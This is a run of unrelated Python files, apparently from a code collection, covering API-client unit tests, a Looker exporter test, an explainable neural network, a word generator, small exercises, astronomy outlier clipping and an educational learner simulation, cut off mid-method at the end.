    result = await sut.set_profile(**args)
    assert 'OK' == result
    aiohttp_request_mock.assert_called_with(method='PUT',
                                            url=f'{DEFAULT_BASE_URL}/api/1.0/users/client/profile',
                                            json=expected_args, proxy=None,
                                            headers={'api-key': api_key}, raise_for_status=False)
# RIGS
@pytest.mark.asyncio
@pytest.mark.parametrize('args, expected_url', [(dict(my=True), f'{DEFAULT_BASE_URL}/api/{API_VERSION}/rigs/my'),
                                                (dict(my=False), f'{DEFAULT_BASE_URL}/api/{API_VERSION}/rigs')])
async def test_rigs_list_must_do_proper_http_request(sut, args, expected_url, api_key, aiohttp_request_mock):
    """rigs_list() must GET /rigs/my or /rigs depending on the `my` flag."""
    listed = await sut.rigs_list(**args)
    assert listed == RESPONSE_RV['result']
    aiohttp_request_mock.assert_called_with(method='GET', url=expected_url,
                                            headers={'api-key': api_key},
                                            proxy=None, raise_for_status=False)
@pytest.mark.asyncio
async def test_rigs_info_must_do_proper_http_request(sut, api_key, aiohttp_request_mock):
    """rig_info() must GET the rig's state endpoint."""
    info = await sut.rig_info(rig_id=RIG_ID)
    assert info == RESPONSE_RV['result']
    aiohttp_request_mock.assert_called_with(method='GET',
                                            url=f'{DEFAULT_BASE_URL}/api/{API_VERSION}/rigs/{RIG_ID}/state',
                                            headers={'api-key': api_key},
                                            proxy=None, raise_for_status=False)
@pytest.mark.asyncio
async def test_rig_price_must_do_proper_http_request(sut, api_key, aiohttp_request_mock):
    """rig_price() must GET the rig's price endpoint."""
    price = await sut.rig_price(rig_id=RIG_ID)
    assert price == RESPONSE_RV['result']
    aiohttp_request_mock.assert_called_with(method='GET',
                                            url=f'{DEFAULT_BASE_URL}/api/{API_VERSION}/rigs/{RIG_ID}/price',
                                            headers={'api-key': api_key},
                                            proxy=None, raise_for_status=False)
@pytest.mark.asyncio
async def test_rigs_info_must_raise_on_error_if_raise_for_error_set(raise_sut, api_key, err_aiohttp_request_mock):
    """An API error body must raise MindsyncApiError carrying code/name/message/body."""
    expected = ERROR_RESPONSE_RV
    with pytest.raises(MindsyncApiError) as exc_info:
        await raise_sut.rig_info(rig_id=RIG_ID)
    code, name, message, body = exc_info.value.args[:4]
    assert code == expected['error']['code']
    assert name == expected['error']['name']
    assert message == expected['error']['message']
    assert body == expected
@pytest.mark.asyncio
@pytest.mark.parametrize('args, expected_args, expected_result', [
    (dict(rig_id=RIG_ID, enable=True, power_cost=0.25, meta=None), dict(isEnable=True, powerCost=0.25), RESPONSE_RV),
    (dict(rig_id=RIG_ID, enable=True, power_cost=0.25), dict(isEnable=True, powerCost=0.25), RESPONSE_RV['result']),
])
async def test_set_rig_must_do_proper_http_request(sut, args, expected_args, expected_result, api_key,
                                                   aiohttp_request_mock, resp_mock):
    """set_rig() must PUT camelCased settings to the rig endpoint."""
    outcome = await sut.set_rig(**args)
    assert outcome == expected_result
    aiohttp_request_mock.assert_called_with(method='PUT',
                                            url=f'{DEFAULT_BASE_URL}/api/{API_VERSION}/rigs/{RIG_ID}',
                                            headers={'api-key': api_key},
                                            json=expected_args, proxy=None,
                                            raise_for_status=False)
# RENTS
@pytest.mark.asyncio
@pytest.mark.parametrize('args, expected_args', [(dict(rig_id=RIG_ID, tariff_name='demo'),
                                                  dict(rigHash=RIG_ID, tariffName='demo'))])
async def test_start_rent_must_do_proper_http_request(sut, args, expected_args, api_key,
                                                      aiohttp_request_mock, resp_mock):
    """start_rent() must POST the rig hash and tariff name to rents/start."""
    resp_mock.json.return_value = {'result': 'OK'}
    outcome = await sut.start_rent(**args)
    assert outcome == 'OK'
    aiohttp_request_mock.assert_called_with(method='POST',
                                            url=f'{DEFAULT_BASE_URL}/api/{API_VERSION}/rents/start',
                                            headers={'api-key': api_key},
                                            json=expected_args, proxy=None,
                                            raise_for_status=False)
@pytest.mark.asyncio
async def test_start_rent_must_raise_on_error_if_raise_for_error_set(raise_sut, api_key, err_aiohttp_request_mock):
    """start_rent() must raise MindsyncApiError with the API error details.

    Fix: the original assigned the awaited result to ``rv`` inside
    ``pytest.raises``, shadowing the expected ERROR_RESPONSE_RV constant --
    misleading dead code (the sibling rig_info test just awaits the call).
    """
    rv = ERROR_RESPONSE_RV
    args = dict(rig_id=RIG_ID, tariff_name='demo')
    with pytest.raises(MindsyncApiError) as exc_info:
        await raise_sut.start_rent(**args)
    exc = exc_info.value
    # The exception carries (code, name, message, raw response body) in order.
    assert exc.args[0] == rv['error']['code']
    assert exc.args[1] == rv['error']['name']
    assert exc.args[2] == rv['error']['message']
    assert exc.args[3] == rv
@pytest.mark.asyncio
@pytest.mark.parametrize('args, expected_args, expected_result', [(dict(rent_id=RENT_ID, meta=None), dict(hash=RENT_ID), RESPONSE_RV),
                                                                  (dict(rent_id=RENT_ID), dict(hash=RENT_ID), RESPONSE_RV['result'])])
async def test_stop_rent_must_do_proper_http_request(sut, args, expected_args, expected_result, api_key,
                                                     aiohttp_request_mock, resp_mock):
    """stop_rent() must POST the rent hash to rents/stop."""
    outcome = await sut.stop_rent(**args)
    assert outcome == expected_result
    aiohttp_request_mock.assert_called_with(method='POST',
                                            url=f'{DEFAULT_BASE_URL}/api/{API_VERSION}/rents/stop',
                                            headers={'api-key': api_key},
                                            json=expected_args, proxy=None,
                                            raise_for_status=False)
@pytest.mark.asyncio
async def test_rent_state_must_do_proper_http_request(sut, api_key, aiohttp_request_mock, resp_mock):
    """rent_state() must GET the rent endpoint by uuid."""
    resp_mock.json.return_value = {'result': 'OK'}
    state = await sut.rent_state(uuid=UUID)
    assert state == 'OK'
    aiohttp_request_mock.assert_called_with(method='GET',
                                            url=f'{DEFAULT_BASE_URL}/api/{API_VERSION}/rents/{UUID}',
                                            headers={'api-key': api_key},
                                            proxy=None, raise_for_status=False)
@pytest.mark.asyncio
async def test_rent_states_must_do_proper_http_request(sut, api_key, aiohttp_request_mock, resp_mock):
    """rent_states() must GET the rent's states endpoint by uuid."""
    resp_mock.json.return_value = {'result': 'OK'}
    states = await sut.rent_states(uuid=UUID)
    assert states == 'OK'
    aiohttp_request_mock.assert_called_with(method='GET',
                                            url=f'{DEFAULT_BASE_URL}/api/{API_VERSION}/rents/{UUID}/states',
                                            headers={'api-key': api_key},
                                            proxy=None, raise_for_status=False)
@pytest.mark.asyncio
async def test_rent_info_must_do_proper_http_request(sut, api_key, aiohttp_request_mock, resp_mock):
    # NOTE(review): this is a byte-for-byte duplicate of
    # test_rent_state_must_do_proper_http_request -- despite its name it calls
    # sut.rent_state(), not a rent-info method. Presumably it should exercise
    # sut.rent_info(); confirm against the client API before changing.
    resp_mock.json.return_value = dict(result='OK')
    result = await sut.rent_state(uuid=UUID)
    assert 'OK' == result
    aiohttp_request_mock.assert_called_with(method='GET', url=f'{DEFAULT_BASE_URL}/api/{API_VERSION}/rents/{UUID}', proxy=None,
                                            headers={'api-key': api_key}, raise_for_status=False)
@pytest.mark.asyncio
@pytest.mark.parametrize('args, expected_args', [(dict(rent_id=RENT_ID, enable=True, login='login', password='password'),
                                                  dict(isEnable=True, login='login', password='password'))])
async def test_set_rent_must_do_proper_http_request(sut, args, expected_args, api_key,
                                                    aiohttp_request_mock, resp_mock):
    """set_rent() must PUT camelCased settings to the rent endpoint."""
    resp_mock.json.return_value = {'result': 'OK'}
    outcome = await sut.set_rent(**args)
    assert outcome == 'OK'
    aiohttp_request_mock.assert_called_with(method='PUT',
                                            url=f'{DEFAULT_BASE_URL}/api/{API_VERSION}/rents/{RENT_ID}',
                                            headers={'api-key': api_key},
                                            json=expected_args, proxy=None,
                                            raise_for_status=False)
@pytest.mark.asyncio
async def test_set_rent_must_raise_on_error_if_raise_for_error_set(raise_sut, api_key, err_aiohttp_request_mock):
    """set_rent() must raise MindsyncApiError with the API error details.

    Fix: the original assigned the awaited result to ``rv`` inside
    ``pytest.raises``, shadowing the expected ERROR_RESPONSE_RV constant --
    misleading dead code (see the rig_info error test for the clean pattern).
    """
    rv = ERROR_RESPONSE_RV
    args = dict(rent_id=RENT_ID, enable=True, login='login', password='password')
    with pytest.raises(MindsyncApiError) as exc_info:
        await raise_sut.set_rent(**args)
    exc = exc_info.value
    # The exception carries (code, name, message, raw response body) in order.
    assert exc.args[0] == rv['error']['code']
    assert exc.args[1] == rv['error']['name']
    assert exc.args[2] == rv['error']['message']
    assert exc.args[3] == rv
# CODES
@pytest.mark.asyncio
async def test_codes_list_must_do_proper_http_request(sut, api_key, aiohttp_request_mock):
    """codes_list() must GET the codes endpoint through the given proxy."""
    listed = await sut.codes_list(proxy=PROXY_URL)
    assert listed == RESPONSE_RV['result']
    aiohttp_request_mock.assert_called_with(method='GET',
                                            url=f'{DEFAULT_BASE_URL}/api/{API_VERSION}/codes',
                                            headers={'api-key': api_key},
                                            proxy=PROXY_URL, raise_for_status=False)
@pytest.mark.asyncio
async def test_create_code_must_do_proper_http_request(sut, api_key, aiohttp_request_mock, open_mock, form_data):
    """create_code() must open the file and POST it as form data.

    Fix: removed the dead ``data=form_data`` local assignment and the
    commented-out leftover -- the expectation is asserted directly below.
    """
    result = await sut.create_code(proxy=PROXY_URL, file=SOME_FN)
    expected_url = f'{DEFAULT_BASE_URL}/api/{API_VERSION}/codes'
    # The file must be opened in binary mode for upload.
    open_mock.assert_called_with(SOME_FN, 'rb')
    assert RESPONSE_RV['result'] == result
    aiohttp_request_mock.assert_called_with(method='POST', url=expected_url, proxy=PROXY_URL,
                                            data=form_data, headers={'api-key': api_key}, raise_for_status=False)
@pytest.mark.asyncio
async def test_create_code_must_raise_on_error_if_raise_for_error_set(raise_sut, api_key, err_aiohttp_request_mock, open_mock):
    """create_code() must raise MindsyncApiError with the API error details.

    Fixes: removed the unused ``args`` dict (copy-pasted from the set_rent
    test) and the ``rv =`` reassignment inside ``pytest.raises`` that
    shadowed the expected ERROR_RESPONSE_RV constant.
    """
    rv = ERROR_RESPONSE_RV
    with pytest.raises(MindsyncApiError) as exc_info:
        await raise_sut.create_code(proxy=PROXY_URL, file=SOME_FN)
    exc = exc_info.value
    # The exception carries (code, name, message, raw response body) in order.
    assert exc.args[0] == rv['error']['code']
    assert exc.args[1] == rv['error']['name']
    assert exc.args[2] == rv['error']['message']
    assert exc.args[3] == rv
@pytest.mark.asyncio
async def test_run_code_must_do_proper_http_request(sut, api_key, aiohttp_request_mock):
    """run_code() must POST the rent hash to the code's run endpoint.

    Fix: removed ``data=form_data`` -- ``form_data`` is not a parameter of
    this test, so the line referenced an undefined name (NameError at run
    time) and its value was never used.
    """
    result = await sut.run_code(code_id=CODE_ID, rent_id=RENT_ID)
    expected_url = f'{DEFAULT_BASE_URL}/api/{API_VERSION}/codes/{CODE_ID}/run'
    assert RESPONSE_RV['result'] == result
    expected_args = dict(rentHash=RENT_ID)
    aiohttp_request_mock.assert_called_with(method='POST', url=expected_url, json=expected_args, proxy=None,
                                            headers={'api-key': api_key}, raise_for_status=False)
@pytest.mark.asyncio
async def test_code_info_must_do_proper_http_request(sut, api_key, aiohttp_request_mock):
    """code_info() must GET the code endpoint by id."""
    info = await sut.code_info(code_id=CODE_ID)
    assert info == RESPONSE_RV['result']
    aiohttp_request_mock.assert_called_with(method='GET',
                                            url=f'{DEFAULT_BASE_URL}/api/{API_VERSION}/codes/{CODE_ID}',
                                            headers={'api-key': api_key},
                                            proxy=None, raise_for_status=False)
| 15,124 | 5,152 |
from unittest import TestCase
from unittest.mock import patch, MagicMock
from requests import Response
from looker_prometheus_exporter.looker_metric_fetcher import LookerMetricFetcher
from looker_prometheus_exporter.looker_auth import LookerAuthenticationError
class TestMetricFetcher(TestCase):
    """Unit tests for LookerMetricFetcher error handling."""

    # Decorators apply bottom-up: get_token patch is the first mock argument.
    @patch("requests.post")
    @patch("looker_prometheus_exporter.looker_metric_fetcher.LookerAuth.get_token", return_value="i_r_bad_token")
    def test_raises_auth_error_appropriately(self, mocked_token_getter, mocked_post):
        """A 401 from the Looker API must surface as LookerAuthenticationError."""
        fetcher = LookerMetricFetcher(
            client_id="i_r_id", client_secret="i_r_secret", looker_base_url="https://example.com", dashboard_id=42
        )
        unauthorized = MagicMock(Response)
        unauthorized.status_code = 401
        unauthorized.json.return_value = {
            "message": "Requires authentication.",
            "documentation_url": "http://docs.looker.com/"
        }
        mocked_post.return_value = unauthorized
        with self.assertRaises(LookerAuthenticationError):
            fetcher._fetch_metrics()
| 1,101 | 340 |
import tensorflow as tf
from .base import BaseNet
class xNN(BaseNet):
    """
    Explainable neural network (xNN).

    xNN is based on the Explainable neural network (Joel et al. 2018) with the following implementation details:

    1. Categorical variables should be first converted by one-hot encoding, and we directly link each of the dummy variables as a bias term to final output.
    2. The projection layer weights are initialized with univariate coefficient or combination of coefficients, considering the number of subnetworks. See the projection_layer function for details.
    3. We train the network and early stop if no improvement occurs in certain epochs.
    4. The subnetworks whose scaling factors are close to zero are pruned for parsimony consideration.
    5. The pruned network will then be fine-tuned.

    Parameters
    ----------
    :type subnet_num: int
    :param subnet_num: the number of subnetworks.
    :type meta_info: dict
    :param meta_info: the meta information of the dataset.
    :type subnet_arch: list
    :param subnet_arch: optional, default=(10, 6).
        The architecture of each subnetworks, the ith element represents the number of neurons in the ith layer.
    :type task_type: string
    :param task_type: optional, one of {"Regression", "Classification"}, default="Regression". Only support binary classification at current version.
    :type batch_size: int
    :param batch_size: optional, default=1000, size of minibatches for stochastic optimizers.
    :type training_epochs: int
    :param training_epochs: optional, default=10000, maximum number of training epochs.
    :type activation_func: tf object
    :param activation_func: optional, default=tf.tanh, activation function for the hidden layer of subnetworks. It can be any tensorflow activation function object.
    :type lr_bp: float
    :param lr_bp: optional, default=0.001, learning rate for weight updates.
    :type beta_threshold: float
    :param beta_threshold: optional, default=0.05, percentage threshold for pruning the subnetworks, which means the subnetworks that sum up to 95% of the total scale will be kept.
    :type tuning_epochs: int
    :param tuning_epochs: optional, default=500, the number of tuning epochs.
    :type l1_proj: float
    :param l1_proj: optional, default=0.001, the strength of L1 penalty for projection layer.
    :type l1_subnet: float
    :param l1_subnet: optional, default=0.001, the strength of L1 penalty for scaling layer.
    :type verbose: bool
    :param verbose: optional, default=False. If True, detailed messages will be printed.
    :type val_ratio: float
    :param val_ratio: optional, default=0.2. The proportion of training data to set aside as validation set for early stopping. Must be between 0 and 1.
    :type early_stop_thres: int
    :param early_stop_thres: optional, default=1000. Maximum number of epochs if no improvement occurs.
    :type random_state: int
    :param random_state: optional, default=0, the random seed.

    References
    ----------
    .. J. Vaughan, A. Sudjianto, E. Brahimi, J. Chen, and V. N. Nair, "Explainable neural networks based on additive index models," The RMA Journal, pp. 40-49, October 2018.
    """

    def __init__(self, subnet_num, meta_info, subnet_arch=[10, 6], task_type="Regression",
                 activation_func=tf.tanh, batch_size=1000, training_epochs=10000, lr_bp=0.001,
                 beta_threshold=0.05, tuning_epochs=500, l1_proj=0.001, l1_subnet=0.001,
                 verbose=False, val_ratio=0.2, early_stop_thres=1000, random_state=0):
        # xNN is a BaseNet with a random projection init, no batch norm and
        # no smoothing penalty (l2_smooth=0).
        super(xNN, self).__init__(meta_info=meta_info,
                                  subnet_num=subnet_num,
                                  subnet_arch=subnet_arch,
                                  task_type=task_type,
                                  proj_method="random",
                                  activation_func=activation_func,
                                  bn_flag=False,
                                  lr_bp=lr_bp,
                                  l1_proj=l1_proj,
                                  l1_subnet=l1_subnet,
                                  l2_smooth=0,
                                  batch_size=batch_size,
                                  training_epochs=training_epochs,
                                  tuning_epochs=tuning_epochs,
                                  beta_threshold=beta_threshold,
                                  verbose=verbose,
                                  val_ratio=val_ratio,
                                  early_stop_thres=early_stop_thres,
                                  random_state=random_state)

    @tf.function
    def train_step_init(self, inputs, labels):
        """One optimizer step over all trainable weights (initial training).

        The loss is the prediction loss plus the L1 regularization collected
        on the projection and output layers.
        """
        with tf.GradientTape() as tape:
            pred = self.__call__(inputs, training=True)
            pred_loss = self.loss_fn(labels, pred)
            regularization_loss = tf.math.add_n(self.proj_layer.losses + self.output_layer.losses)
            total_loss = pred_loss + regularization_loss
        grads = tape.gradient(total_loss, self.trainable_weights)
        self.optimizer.apply_gradients(zip(grads, self.trainable_weights))

    @tf.function
    def train_step_finetune(self, inputs, labels):
        """One optimizer step for fine-tuning after pruning.

        The projection-layer kernel is frozen: only the remaining trainable
        weights are updated, and no regularization is applied.
        """
        with tf.GradientTape() as tape:
            pred = self.__call__(inputs, training=True)
            total_loss = self.loss_fn(labels, pred)
        # Exclude the projection kernel so the learned projections stay fixed.
        # (The original also built an unused list of weight names here.)
        train_weights = [w for w in self.trainable_weights
                         if w.name != self.proj_layer.weights[0].name]
        grads = tape.gradient(total_loss, train_weights)
        self.optimizer.apply_gradients(zip(grads, train_weights))
| 5,801 | 1,767 |
# https://stackoverflow.com/questions/6028000/how-to-read-a-static-file-from-inside-a-python-package
# see above how to read in words from the files...
try:
import importlib.resources as pkg_resources
except ImportError:
# Try backported to PY<37 `importlib_resources`.
import importlib_resources as pkg_resources
from random import choice as randchoice
from random import shuffle
class WordGenerator:
    """Random word generator backed by word lists shipped as package data.

    Word lists live in the ``randomwordz.data`` package, one file per
    part-of-speech code (e.g. ``NOUN.txt``), with one word per line.

    Fix: ``get_random`` used a bare ``except:`` which swallowed every error;
    it now catches only the ``IndexError`` raised by ``choice`` on an empty
    sequence (i.e. an unknown code).
    """

    def __init__(self, debug=False):
        # Maps part-of-speech code -> list of words for that code.
        self.data = {}
        self.codes = [
            "ADJ", "ADP", "CONJ", "DET", "NOUN",
            "NUM", "PRON", "PRT", "VERB", "NAME"
        ]
        self.debug = debug
        self._load()

    def _load(self):
        """Read every word list from package data into ``self.data``."""
        for name in self.codes:
            self.data[name] = pkg_resources.read_text(
                "randomwordz.data",
                f"{name}.txt"
            ).split('\n')

    def _debug_msg(self, code):
        # In debug mode, tell the user which codes are valid.
        if code not in self.data and self.debug:
            print(f"Code {code} is invalid, try one of these:")
            print(self.codes)

    def get_all(self, code):
        """Return a copy of all words of the given type ([] for unknown codes)."""
        code = code.upper()
        self._debug_msg(code)
        return list(self.data.get(code, []))

    def get_all_random(self, code):
        """Return all words of the given type in random order."""
        code = code.upper()
        self._debug_msg(code)
        words = list(self.data.get(code, []))
        shuffle(words)
        return words

    def get_random(self, code):
        """Return one random word of the given type, or "" if none exist."""
        code = code.upper()
        self._debug_msg(code)
        try:
            return randchoice(self.data.get(code, []))
        except IndexError:
            # choice() raises IndexError on an empty sequence (unknown code).
            return ""
| 1,708 | 532 |
# Read integers from the user until they choose to stop, keeping each value
# only once, then print the collected values in ascending order.
numeros = list()
while True:
    digitado = (int(input('Digite os valores: ')))
    # Duplicate handling: a repeated value is removed here and re-appended
    # below, so the list still ends up with exactly one copy of it.
    if digitado not in numeros[:]:
        print('Número adicionado com sucesso...')
    else:
        numeros.remove(digitado)
        print('Erro! Valor já digitado')
    numeros.append(digitado)
    # Keep asking until the answer is S or N.
    # NOTE(review): an empty answer satisfies `in 'SN'` (empty substring is
    # in every string) and is treated as "continue" -- confirm intended.
    parada = str(input('Quer adicionar mais valores[S/N]? ')).upper().strip()
    while parada not in 'SN':
        parada = str(input('Quer adicionar mais valores[S/N]? ')).upper().strip()
    if 'N' in parada:
        break
numeros.sort()
print(f'Os números digitados foram: {numeros} (estão ordenados)')
class Solution:
    def numWays(self, n: int) -> int:
        """Count the ways to climb n steps taking 1 or 2 at a time.

        Fibonacci-style recurrence, reported modulo 1_000_000_007.
        n == 0 counts as one way (the empty climb).
        """
        MOD = 1000000007
        prev, curr = 1, 1
        for _ in range(n):
            prev, curr = curr, (prev + curr) % MOD
        return prev
| 199 | 101 |
import numpy as np
from astropy.convolution import Box1DKernel, convolve
from astropy.stats import sigma_clip
def clip_outliers(data, log, wavelength, sigma=10, box_width=5, maxiters=5, fill_value='mask', verbose=False):
    '''Find outliers in 1D time series.

    Be careful when using this function on a time-series with known astrophysical variations. The variable
    box_width should be set to be significantly smaller than any astrophysical variation timescales otherwise
    these signals may be clipped.

    Parameters
    ----------
    data: ndarray (1D, float)
        The input array in which to identify outliers. NOTE: when fill_value
        is a constant, this array is modified in place.
    log: logedit.Logedit
        The open log in which notes from this step can be added.
    wavelength: float
        The wavelength currently under consideration (only used for logging).
    sigma: float
        The number of sigmas a point must be from the rolling mean to be considered an outlier
    box_width: int
        The width of the box-car filter (used to calculated the rolling median) in units of number of data points
    maxiters: int
        The number of iterations of sigma clipping that should be performed.
    fill_value: string or float
        Either the string 'mask' to mask the outlier values, 'boxcar' to replace data with the mean from the box-car filter, or a constant float-type fill value.
    verbose: bool
        If True, log the number of outliers identified.

    Returns
    -------
    data: ndarray (1D)
        An array with the same dimensions as the input array with outliers replaced with fill_value
        (a masked array when fill_value is 'mask').
    int
        The number of outliers that were identified.

    Notes
    -----
    History:

    - Jan 29-31, 2022 Taylor Bell
        Initial version, added logging
    '''
    kernel = Box1DKernel(box_width)
    # Compute the moving mean
    smoothed_data = convolve(data, kernel, boundary='extend')
    # Compare data to the moving mean (to remove astrophysical signals)
    residuals = data-smoothed_data
    # Sigma clip residuals to find bad points in data
    residuals = sigma_clip(residuals, sigma=sigma, maxiters=maxiters, cenfunc=np.ma.median)
    outliers = np.ma.getmaskarray(residuals)
    if np.any(outliers) and verbose:
        log.writelog('Identified {} outliers for wavelength {}'.format(np.sum(outliers), wavelength))
    # Replace clipped data
    if fill_value=='mask':
        data = np.ma.masked_where(outliers, data)
    elif fill_value=='boxcar':
        data = replace_moving_mean(data, outliers, kernel)
    else:
        data[outliers] = fill_value
    return data, np.sum(outliers)
def replace_moving_mean(data, outliers, kernel):
    '''Fill flagged points with the local mean of a box-car smoothed series.

    Parameters
    ----------
    data: ndarray (1D, float)
        The series whose flagged entries should be replaced (modified in place).
    outliers: ndarray (1D, bool)
        Boolean mask flagging which entries of `data` to replace.
    kernel: astropy.convolution.Kernel1D
        The kernel used to compute the moving mean.

    Returns
    -------
    data: ndarray
        The same array, with flagged entries replaced by the moving mean.

    Notes
    -----
    History:

    - Jan 29, 2022 Taylor Bell
        Initial version
    '''
    # NaN-out the flagged points first so they do not bias the moving mean.
    data[outliers] = np.nan
    smoothed = convolve(data, kernel, boundary='extend')
    # Substitute each flagged point with the smoothed value at that index.
    data[outliers] = smoothed[outliers]
    return data
| 3,403 | 1,000 |
from collections import defaultdict
import string

CHARACTERS = ['Red Riding Hood',
              # we're omitting 'mother' here for simplicity
              # (= substring grandmother)
              ('Grandmother', 'Grandma', 'Granny'),
              'wolf', 'woodsman']

text = """
Once upon a time, there was a little girl who lived in a village near the forest. Whenever she went out, the little girl wore a red riding cloak, so everyone in the village called her Little Red Riding Hood.
One morning, Little Red Riding Hood asked her mother if she could go to visit her grandmother as it had been awhile since they'd seen each other.
"That's a good idea," her mother said. So they packed a nice basket for Little Red Riding Hood to take to her grandmother.
When the basket was ready, the little girl put on her red cloak and kissed her mother goodbye.
"Remember, go straight to Grandma's house," her mother cautioned. "Don't dawdle along the way and please don't talk to strangers! The woods are dangerous."
"Don't worry, mommy," said Little Red Riding Hood, "I'll be careful."
But when Little Red Riding Hood noticed some lovely flowers in the woods, she forgot her promise to her mother. She picked a few, watched the butterflies flit about for awhile, listened to the frogs croaking and then picked a few more.
Little Red Riding Hood was enjoying the warm summer day so much, that she didn't notice a dark shadow approaching out of the forest behind her...
Suddenly, the wolf appeared beside her.
"What are you doing out here, little girl?" the wolf asked in a voice as friendly as he could muster.
"I'm on my way to see my Grandma who lives through the forest, near the brook," Little Red Riding Hood replied.
Then she realized how late she was and quickly excused herself, rushing down the path to her Grandma's house.
The wolf, in the meantime, took a shortcut...
The wolf, a little out of breath from running, arrived at Grandma's and knocked lightly at the door.
"Oh thank goodness dear! Come in, come in! I was worried sick that something had happened to you in the forest," said Grandma thinking that the knock was her granddaughter.
The wolf let himself in. Poor Granny did not have time to say another word, before the wolf gobbled her up!
The wolf let out a satisfied burp, and then poked through Granny's wardrobe to find a nightgown that he liked. He added a frilly sleeping cap, and for good measure, dabbed some of Granny's perfume behind his pointy ears.
A few minutes later, Red Riding Hood knocked on the door. The wolf jumped into bed and pulled the covers over his nose. "Who is it?" he called in a cackly voice.
"It's me, Little Red Riding Hood."
"Oh how lovely! Do come in, my dear," croaked the wolf.
When Little Red Riding Hood entered the little cottage, she could scarcely recognize her Grandmother.
"Grandmother! Your voice sounds so odd. Is something the matter?" she asked.
"Oh, I just have touch of a cold," squeaked the wolf adding a cough at the end to prove the point.
"But Grandmother! What big ears you have," said Little Red Riding Hood as she edged closer to the bed.
"The better to hear you with, my dear," replied the wolf.
"But Grandmother! What big eyes you have," said Little Red Riding Hood.
"The better to see you with, my dear," replied the wolf.
"But Grandmother! What big teeth you have," said Little Red Riding Hood her voice quivering slightly.
"The better to eat you with, my dear," roared the wolf and he leapt out of the bed and began to chase the little girl.
Almost too late, Little Red Riding Hood realized that the person in the bed was not her Grandmother, but a hungry wolf.
She ran across the room and through the door, shouting, "Help! Wolf!" as loudly as she could.
A woodsman who was chopping logs nearby heard her cry and ran towards the cottage as fast as he could.
He grabbed the wolf and made him spit out the poor Grandmother who was a bit frazzled by the whole experience, but still in one piece."Oh Grandma, I was so scared!" sobbed Little Red Riding Hood, "I'll never speak to strangers or dawdle in the forest again."
"There, there, child. You've learned an important lesson. Thank goodness you shouted loud enough for this kind woodsman to hear you!"
The woodsman knocked out the wolf and carried him deep into the forest where he wouldn't bother people any longer.
Little Red Riding Hood and her Grandmother had a nice lunch and a long chat.
"""


def make_character_index(text=text, characters=CHARACTERS):
    """Return a dict with keys are characters (lowercased) and values
    the lines they appear in sorted order.

    Matches should be case insensitive.
    If a character has multiple synonyms
    - e.g. ('Grandmother', 'Grandma', 'Granny') -
    then return the former as key.

    Fixes: the original recomputed ``splitlines()`` inside every loop
    iteration (quadratic work); used ``type(x) == tuple`` instead of
    ``isinstance``; and carried dead commented-out code plus a trailing
    module-level ``pass``.
    """
    index_dict = defaultdict(list)
    # Normalize once: lowercase and strip punctuation, then split into lines.
    normalized = text.lower().translate(str.maketrans('', '', string.punctuation))
    lines = normalized.splitlines()
    for character in characters:
        # Treat a plain string as a single-synonym tuple; the first synonym
        # (lowercased) becomes the index key.
        synonyms = character if isinstance(character, tuple) else (character,)
        key = synonyms[0].lower()
        for line_no, line in enumerate(lines):
            if any(syn.lower() in line for syn in synonyms):
                index_dict[key].append(line_no)
    return index_dict
# Minimal pandas demo: load the Gapminder Oceania GDP table and display it.
import pandas

# Read the CSV into a DataFrame (default integer row index).
data = pandas.read_csv('data/gapminder_gdp_oceania.csv')
print(data)
| 83 | 33 |
# coding: utf-8
# 2019/11/26 @ tongshiwei
import numpy as np
import random
import math
import networkx as nx
from EduSim.Envs.meta import MetaLearner, MetaInfinityLearnerGroup, MetaLearningModel, Item
from EduSim.Envs.shared.KSS_KES.KS import influence_control
__all__ = ["Learner", "LearnerGroup"]
class LearningModel(MetaLearningModel):
    """Simulates how practising a knowledge point changes a learner's state.

    Mastery values appear to live on an open-ended scale capped at 5
    (see the cap in ``_promote``). The model respects the prerequisite
    structure: gains on a knowledge point shrink exponentially with how far
    its predecessors are from full mastery.
    """

    def __init__(self, state, learning_target, knowledge_structure, last_visit=None):
        # state: mutable mastery vector indexed by knowledge id
        # learning_target: set of knowledge ids the learner aims to master
        # knowledge_structure: prerequisite DAG (networkx DiGraph) over ids
        # last_visit: most recently practised knowledge id, or None
        self._state = state
        self._target = learning_target
        self._ks = knowledge_structure
        self._ks_last_visit = last_visit

    def step(self, state, knowledge):
        """Apply one practice step of ``knowledge`` to ``state`` (in place)."""
        if self._ks_last_visit is not None:
            # Skip the step unless this knowledge point is allowed next,
            # given the last visit, under the influence-control rule.
            if knowledge not in influence_control(
                self._ks, state, self._ks_last_visit, allow_shortcut=False, target=self._target,
            )[0]:
                return
        self._ks_last_visit = knowledge
        # capacity growth function: the further the prerequisites are from
        # full mastery (5), the larger the discount and the smaller the gain.
        discount = math.exp(sum([(5 - state[node]) for node in self._ks.predecessors(knowledge)] + [0]))
        ratio = 1 / discount
        # Gain is half the remaining headroom, scaled by the discount ratio.
        inc = (5 - state[knowledge]) * ratio * 0.5

        def _promote(_ind, _inc):
            # Raise mastery of _ind (capped at 5) and recursively propagate
            # half of the increment to each successor.
            state[_ind] += _inc
            if state[_ind] > 5:
                state[_ind] = 5
            for node in self._ks.successors(_ind):
                _promote(node, _inc * 0.5)

        _promote(knowledge, inc)
class Learner(MetaLearner):
    """A single simulated learner whose state evolves as items are practised."""

    def __init__(self,
                 initial_state,
                 knowledge_structure: nx.DiGraph,
                 learning_target: set,
                 _id=None,
                 seed=None):
        super(Learner, self).__init__(user_id=_id)
        self._state = initial_state
        self._target = learning_target
        self._logs = []
        self.structure = knowledge_structure
        self.random_state = np.random.RandomState(seed)
        # The learning model shares the mutable state vector with the learner.
        self.learning_model = LearningModel(
            initial_state,
            learning_target,
            knowledge_structure,
        )

    def update_logs(self, logs):
        """Replace the learner's interaction logs."""
        self._logs = logs

    @property
    def profile(self):
        """Learner profile: id, interaction logs and learning target."""
        return {
            "id": self.id,
            "logs": self._logs,
            "target": self.target
        }

    def learn(self, learning_item: Item):
        """Advance the knowledge state by practising the item's knowledge point."""
        self.learning_model.step(self._state, learning_item.knowledge)

    @property
    def state(self):
        """Current mastery vector (shared with the learning model)."""
        return self._state

    def response(self, test_item: Item) -> ...:
        """Return the mastery level of the tested knowledge point."""
        return self._state[test_item.knowledge]

    @property
    def target(self):
        """The set of knowledge ids this learner aims to master."""
        return self._target
class LearnerGroup(MetaInfinityLearnerGroup):
    """An endless source of randomly-initialised Learners over one knowledge structure."""

    def __init__(self, knowledge_structure, seed=None):
        super(LearnerGroup, self).__init__()
        self.knowledge_structure = knowledge_structure
        # Drives all randomness for generated learners' states and targets.
        self.random_state = np.random.RandomState(seed)

    def __next__(self):
